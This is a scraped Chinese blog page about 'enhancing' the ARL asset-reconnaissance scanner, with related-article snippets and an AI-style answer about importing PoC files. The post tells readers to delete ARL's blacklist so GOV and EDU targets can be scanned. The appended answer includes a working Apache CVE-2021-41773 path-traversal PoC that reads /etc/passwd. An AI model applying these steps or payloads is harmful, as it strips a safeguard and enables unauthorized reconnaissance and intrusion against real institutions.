网安工具系列:资产扫描神器ARL增强改造

最新推荐文章于 2024-12-06 11:58:17 发布
最新推荐文章于 2024-12-06 11:58:17 发布
阅读量1.2k 收藏
点赞数 14
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: 网络 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_54626591/article/details/140446488
网络安全 专栏收录该内容
219 篇文章 ¥299.90 ¥399.90
订阅专栏

资产扫描神器ARL增强改造



资产扫描神器ARL增强改造

拉取项目

首先从GitHub克隆到服务器上。

git clone https://github.com/ki9mu/ARL-plus-docker/

在这里插入图片描述

修改配置文件

因为ARL在配置文件里设置了黑名单,有时候项目为GOV或者EDU之类的时候无法进行扫描,所以在这里修改一下配置文件就可以解除限制。

cd ARL-plus-docker/
vi config-docker.yaml

在这里删掉黑名单里的几项就可以了

了解本专栏 订阅专栏 解锁全文
ARL灯塔魔改,自动化资产搜集+漏扫+推送+1W加指纹
qq_47289634的博客
05-22 1万+
灯塔删库了,没有灯塔我该怎么活,在搭建这一套自动化资产搜集+漏扫体系之前,我一般是使用网络搜索引擎(fofa、zoomeye、hunter等)和C段ip进行资产搜集,然后批量指纹扫描工具(Ehole、Glass等)进行指纹识别,使用xray、nuclei进行批量漏扫。按照之前使用的打点流程存在缺陷,总觉得不太好用,打算强化一下灯塔Nuclei 基于模板跨目标发送请求,扫描速度快且准确度高,可一键更新模板库,模板库来源于nuclei社区,活跃度还是比较高的,因此模板更新速度也比较客观。
工具功能加强-对ARL改造
bluemoon_0的博客
02-27 415
工具功能加强-对ARL改造
centOS部署ARLARL增强
qq_43091539的博客
01-22 1085
这时候还需要进容器修改一下python代码,因为在python脚本里也有黑名单。先使用docker ps看一下容器的ID,然后进入这个容器进行修改,使用vi进行编辑。此时ARL已经可以正常访问:admin/arlpass。docker exec -it 对应ID bash。docker ps #查看容器ID。安装docker-compose。此时已升级完成,可以正常使用。ARL升级至ARL-plus。更换完成后执行步骤1。在docker中安装。
【渗透测试】自动化工具!!资产收集ARL灯塔
KKleeeaa的博客
02-02 2037
信息搜集灯塔资产收集
信息搜集工具-ARL安装教程
Crazy_Stone_liu的博客
12-06 1427
Vmware 中搭建的 centos7 环境,无docker,amd架构。
《渗透测试》-前期信息收集及工具介绍02(ARL、Cwebscanner)
HAKUNAMATATATTA的博客
10-12 3354
ARL\Cwebscanner 子域名收集工具介绍
资产扫描神器ARL增强改造
渗透测试研究中心
12-08 7012
拉取项目首先从GitHub克隆到服务器上。git clone https://github.com/ki9mu/ARL-plus-docker/修改配置文件因为ARL在配置文件里设置了黑名单,有时候项目为GOV或者EDU之类的时候无法进行扫描,所以在这里修改一下配置文件就可以解除限制。cd ARL-plus-docker/ vi config-docker.yaml在这里删掉黑名单里的几项就可以...
ARL(资产侦察灯塔系统)v2.6版本
tubug的博客
12-21 6782
2023年12月21日,灯塔使用教学v0.1
kali安装ARL灯塔资产收集(一些问题解决)
m0_64376783的博客
06-03 2426
小白安装灯塔(ARL
ARL灯塔安装与使用
热门推荐
剁椒鱼头没剁椒的博客
10-30 1万+
这里子域名替换,原先自带的是2w的字典,但是在github上有很多公开的很多子域名的字典,直接替换就可以了,其实这里,不单单是子域名能够替换,还有很多文件都可以替换。系统配置建议:CPU:4线程 内存:8G 带宽:10M。有些我也搞不到,想修改或者加强还需自己添加呀,这里也附上官网地址,具体的使用就不说了,基本上都是输入IP或者域名后自动化扫描的,没什么好说的。这里默认情况下是没有指纹的,需要自己配置或者收集,这里从github上找到一共开源的,但是这个指纹呢有两年没更新了,那么怎么办,我们可以使用。
红队专题-APT开源工具
aming小老弟
12-07 2408
GitHub地址:https://github.com/ki9mu/ARL-plus-docker/releases。爬取exploit_db,github,seebug,metasploit,vulhub等多个平台的漏洞信息。源码地址 https://github.com/TophantTechnology/ARL。默认 有 docker compose环境 并 启动。config-docker.yaml文件。
kali2023安装docker+ARL灯塔一遍配置优化
qq_58873970的博客
07-06 6810
Docker是渗透测试中必学不可的一个容器工具,在其中,我们能够快速创建、运行、测试以及部署应用程序。如,我们对一些漏洞进行本地复现时,可以使用Docker快速搭建漏洞环境,完成复现学习。ARL(灯塔)应用于快速收集所需目标互联网的集成工具,提供较为宽阔的域面供甲方安全团队或者渗透测试工程师来完成对目标的渗透,促使企事业单位网络、系统以及设备等的安全能力会大大提高。本篇就以如何在kali_linux上部署docker及ARL灯塔来进行论述。
ARL 灯塔 | CentOS7 — ARL 灯塔搭建流程(Docker)
Blue17 の 小窝
10-22 8444
灯塔,全称:ARL 资产侦察灯塔系统,有着域名资产发现和整理、IP/IP 段资产整理、端口扫描和服务识别、WEB 站点指纹识别、资产分组管理和搜索等等功能块。
资产收集利器-ARL灯塔
mashiro_hibiki的博客
04-19 6725
ARL(Asset Reconnaissance Lighthouse)资产侦察灯塔系统,旨在快速侦察与目标关联的互联网资产,构建基础资产信息库。它拥有收集管理资产资产监控、扫描与管理指纹、Github 关键字监控、文件泄漏等风险检测、nuclei PoC 调用等功能。
灯塔信息收集
weixin_60250620的博客
04-16 829
某老师傅说的:信息搜集的广度决定了攻击的广度,知识面的广度决定了攻击的深度。信息搜集永远都是渗透人员最重要的必修课,关于信息搜集想必其他的文章都已经提到很多了,比如子公司,域名,子域名,之后,个人中心处查看,这儿最好是有fofa高级会员,因为普通会员只能查看60条数据,高级会员能看10W条,高级会员搜集信息更加全面,这里我提供自有高级会员API)这里的ip就是kali的ip,如果你的kali安装在虚拟机,你可以用kali自带的火狐浏览器打开,也可以在本机上用自己的浏览器输入kali虚拟机的ip进行访问。
记一次信息收集工具-灯塔(arl)安装遇到的坑(timeout of 12000ms exceeded)
qq_36836233的博客
04-24 6631
二、遇到的问题(timeout of 12000ms exceeded)但是在config.yaml中并未声明这个。#PS:注意空格数量以及对齐。#Fofa API 配置项。1、docker安装。
ARL 2.6.2没看到有直接上传poc的地方
最新发布
03-08
<think>嗯,用户之前问过如何在灯塔ARL系统中导入YAML格式的POC文件,现在他提到ARL 2.6.2版本没有直接上传POC的地方。首先,我需要确认ARL不同版本之间的差异。用户之前得到的回答可能是基于较新的版本,比如v2.10.1+,而他现在使用的是较旧的2.6.2版本。 接下来,我需要回忆一下ARL的版本更新历史。可能是在某个版本之后,比如v2.8或更高,才加入了Web界面上传POC的功能。而2.6.2版本可能还没有这个功能,所以用户找不到上传入口。这时候,用户可能需要通过其他方式导入POC,比如手动放置文件到特定目录或者使用命令行工具。 然后,用户的需求很明确,就是想在旧版本中导入POC。我需要提供适用于旧版本的方法。可能的解决方法包括手动将YAML文件复制到容器内的指定目录,或者使用系统设置中的批量导入功能。此外,可能还需要提醒用户关于路径的正确性、文件权限以及重启服务等注意事项。 另外,用户可能没有升级到最新版本,可能需要建议升级,但也要考虑到用户可能因为某些原因无法升级,所以需要提供替代方案。同时,要注意用户可能遇到的问题,比如文件路径错误、权限不足等,需要给出排查步骤。 最后,确保回答结构清晰,分步骤说明,并且给出示例命令,方便用户操作。同时,提醒用户不同版本之间的差异,避免混淆。</think>根据ARL 2.6.2版本的实际架构,POC文件需要通过文件系统手动部署,以下是具体操作指南: **操作步骤详解:** 1. **定位POC存储路径**(容器内路径) ```bash # 进入ARL容器(docker部署方式示例) docker exec -it arl_web_1 /bin/bash # 官方默认存储路径 cd /opt/ARL/docker/config/poc/ ``` 2. **文件格式要求** - 必须使用`.yaml`扩展名 - 文件名格式:`<漏洞名称>_poc.yaml`(如:`apache_path_traversal_poc.yaml`) - 编码必须为UTF-8(避免中文乱码) 3. **手动部署示例**(以CVE-2021-41773为例) ```bash # 创建新POC文件 vi apache_path_traversal_poc.yaml # 粘贴POC内容(注意缩进必须为空格) name: apache-path-traversal transport: http rules: r0: request: method: GET path: "/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd" expression: response.status == 200 && response.body.bcontains(b"root:x:0:0") ``` 4. **权限设置** ```bash # 确保文件权限正确(ARL使用www-data用户运行) chown www-data:www-data apache_path_traversal_poc.yaml chmod 644 apache_path_traversal_poc.yaml ``` 5. **服务重载** ```bash # 重启ARL服务使配置生效 docker-compose restart web ``` **验证部署结果:** 1. 访问Web界面 `http://arl-ip:5003` 2. 新建扫描任务时,在POC选择列表应能看到新增的检测项 **替代方案(适用于批量导入):** 1. 通过`系统设置`➔`数据管理`➔`POC导入` 2. 上传包含多个POC的ZIP压缩包(自动解压到`/opt/ARL/docker/config/poc/`) **版本差异说明:** | 功能 | 2.6.2 | 2.10.1+ | |-------------------|-------------------------------|--------------------------| | Web界面单文件上传 | ❌ 不支持 | ✅ 支持 | | 批量导入 | ✅ 仅ZIP压缩包 | ✅ 支持ZIP/YAML混合上传 | | 实时生效 | 需重启服务 | 自动热加载 | | 版本验证 | 推荐升级至v2.8.3+获得更好体验 | 原生支持新特性 | **注意事项:** 1. 每个POC文件必须包含完整的`name`和`rules`定义 2. 避免使用特殊字符:`!@#$%^&*()`等符号需转义 3. 可通过`docker logs -f arl_web_1`查看加载日志 4. 历史版本POC语法校验较宽松,建议通过测试任务验证有效性 (建议升级至最新版本获取完整功能)升级命令: ```bash cd /opt/ARL && git pull origin master docker-compose down && docker-compose up -d ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

坦笑&&life

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值